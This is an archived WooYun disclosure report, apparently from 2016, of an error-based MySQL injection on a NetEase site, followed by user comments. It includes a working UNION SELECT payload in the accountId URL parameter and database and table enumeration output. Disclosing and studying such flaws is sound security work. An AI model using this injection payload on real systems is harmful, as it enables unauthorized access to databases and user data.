网易某站点MySQL报错注入漏洞

编号189928
Urlhttp://www.wooyun.org/bug.php?action=view&id=189928
漏洞状态厂商已经确认
漏洞标题网易某站点MySQL报错注入漏洞
漏洞类型SQL注射漏洞
厂商网易
白帽子lijiejie
提交日期2016-03-28 11:29:00
公开日期2016-05-15 10:40:00
修复时间(not set)
确认时间2016-03-31 00:00:00
Confirm Spend3
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank12
厂商评级
厂商评rank12
漏洞简介
网易某站点MySQL报错注入
漏洞细节

http://hermes.da.netease.com/account/getAccountCount?accountId=' and 1=2 union select user(),2,3,4,5,6%23&productId=0


参数accountId可注入,MySQL报错注入。

hermes.da.netease.com.mysqli.png

POC

available databases [3]:
[*] hermes
[*] information_schema
[*] test


Database: hermes
[9 tables]
+-----------------------+
| db_info |
| hive_info |
| sys_account_authority |
| sys_account_info |
| sys_product |
| sys_role |
| task_extra |
| task_info |
| time_job |
+-----------------------+


修复方案

参数过滤,转义

状态信息 2016-03-28: 细节已通知厂商并且等待厂商处理中
2016-03-31: 厂商已经确认,细节仅向厂商公开
2016-04-10: 细节向核心白帽子及相关领域专家公开
2016-04-20: 细节向普通白帽子公开
2016-04-30: 细节向实习白帽子公开
2016-05-15: 细节向公众公开
厂商回复该问题已修复,感谢您对网易产品的关注。
回应信息危害等级:高漏洞Rank:12 确认时间:2016-03-31 10:34
Showing 1-11 of 11 items.
评论内容评论人点赞数评论时间

@lijiejie @奶嘴 求带走

坏男孩-A_A02016-03-29 11:28:00

李姐姐 必须关注

雅柏菲卡02016-03-28 14:14:00

泥萌src缺人不(*_*)没事,,锻炼技术

奶嘴02016-03-28 13:59:00

@奶嘴 大牛,你艾特错人啦(*_*)

坏男孩-A_A02016-03-28 13:52:00

@坏男孩-A_A 大神 受下我的单膝

奶嘴02016-03-28 13:39:00

@lijiejie 泥萌src缺人不(*_*)

坏男孩-A_A02016-03-28 13:36:00

@奶嘴 你看看评论,你只附了截图,补充一下超链接。 :)

lijiejie02016-03-28 11:37:00

lijiejie,我在爱奇艺SRC的洞您还没给我审核呢

奶嘴02016-03-28 11:33:00

啪啪啪

sysALong02016-03-28 11:32:00

附验证脚本

Aasron02016-03-28 11:31:00

网易我记得去年还是前年,泄露数据库了,然后不承认泄露,然后还吹牛逼,国家级什么什么安全。。。还拿出证书了。。。 现在被打脸了有没有?

木有鱼丸02016-03-28 11:31:00